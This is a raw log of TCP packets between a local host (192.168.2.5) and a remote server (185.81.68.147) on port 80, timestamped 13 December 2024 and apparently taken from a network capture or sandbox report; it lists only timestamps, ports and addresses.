Dec 13, 2024 01:37:09.573720932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.574435949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.574517965 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.574556112 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.574652910 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.575366974 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.575566053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.576277018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.576359034 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.576378107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.576421976 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.577173948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.577285051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.578058958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.578141928 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.578187943 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.578290939 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.578978062 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.579032898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.579472065 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.579911947 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.580044985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.580771923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.580852985 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.725114107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.725135088 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.725298882 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.725415945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.725497961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.725673914 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.726325989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.726437092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.726593018 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.727273941 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.727431059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.727530003 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.728158951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.728218079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.728327036 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.729077101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.729207039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.729320049 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.730106115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.730214119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.730859041 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.730871916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.730958939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.731121063 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.731796026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.731888056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.732012033 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.732732058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.732758045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.732876062 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.733598948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.733710051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.734534979 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.734688997 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.734709978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.734829903 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.735430002 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.735582113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.736330032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.736443996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.736449003 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.736490011 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.737245083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.737392902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.737775087 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.738151073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.738245010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.738359928 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.739063978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.739182949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.739279032 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.739989042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.740102053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.740231037 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.740873098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.741024017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.741247892 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.741805077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.741913080 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.742022991 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.742681980 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.742808104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.743016958 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.743623018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.743753910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.743880987 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.744507074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.744621038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.744730949 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.745445967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.745541096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.745675087 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.746326923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.746483088 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.747232914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.747345924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.747349977 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.747467041 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.748152971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.748271942 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.748780012 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.749068975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.749265909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.749701977 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.749959946 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.750082016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.750480890 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.750931978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.750997066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.751141071 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.751790047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.751899004 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.752068996 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.752695084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.752841949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.753597975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.753717899 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.753796101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.753848076 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.754513979 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.754636049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.754770994 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.755433083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.755494118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.755656958 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.756354094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.756421089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.756534100 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.757296085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.757368088 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.757478952 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.758160114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.758276939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.759053946 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.759150028 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.759174109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.759995937 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.760108948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.760109901 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.760171890 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.760900974 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.761039972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.761137009 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.761782885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.761908054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.762025118 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.762711048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.762842894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.762957096 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.763650894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.763755083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.763905048 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.764519930 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.764631987 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.764744997 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.765446901 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.765559912 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.765678883 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.766386032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.766494036 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.766649008 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.767257929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.767374039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.767484903 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.768177986 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.768349886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.768775940 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.769073009 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.769212008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.769963980 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.769994974 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.770128012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.770535946 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.770934105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.771018028 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.771116018 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.771986008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.772027016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.772175074 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.772694111 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.817163944 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.917056084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.917117119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.917282104 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.917382956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.917481899 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.917531013 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.918327093 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.918436050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.918545008 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.919214964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.919346094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.919461012 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.920187950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.920216084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.920342922 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.921045065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.921180010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.921291113 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.921958923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.921977043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.922108889 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.922841072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.922956944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.923063040 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.923782110 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.923964977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.924058914 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.924669027 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.924806118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.924913883 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.925607920 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.925729990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.925829887 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.926489115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.926587105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.926683903 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.927429914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.927494049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.927602053 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.928333998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.928431034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.928536892 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.929208994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.929311037 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.929424047 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.930110931 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.930234909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.930337906 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.931080103 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.931221962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.931334019 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.931925058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.932039022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.932145119 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.932831049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.932971001 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.933078051 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.933767080 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.933969975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.934079885 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.934667110 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.934771061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.934894085 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.935564041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.935672045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.935784101 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.936486006 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.936558962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.936665058 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.937396049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.937505007 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.937611103 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.938302994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.938411951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.938520908 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.939208984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.939449072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.939569950 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.940114975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.940263033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.940373898 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.941018105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.941138983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.941245079 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.941955090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.942055941 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.942190886 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.942866087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.942954063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.943058014 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.943749905 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.943893909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.943994045 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.944674969 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.944776058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.944875956 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.945609093 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.945704937 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.945813894 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.946477890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.946597099 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.946710110 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.947438955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.947511911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.947626114 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.948299885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.948324919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.948450089 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.949218035 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.949356079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.949467897 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.950138092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.950285912 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.950397015 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.951107979 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.951195955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.951302052 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.951972961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.952049971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.952157974 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.952882051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.953078032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.953186989 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.953771114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.953933001 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.954046011 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.954679966 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.954777002 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.954885960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.955578089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.955715895 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.955826044 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.956509113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.956610918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.956722975 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.957412958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.957465887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.957578897 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.958316088 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.958492041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.958600044 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.959335089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.959409952 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.959518909 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.960169077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.960351944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.960458040 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.961046934 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.961149931 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.961253881 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.961939096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.962054014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.962161064 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:09.962842941 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:09.963021994 CET	80	49707	185.81.68.147	192.168.2.5
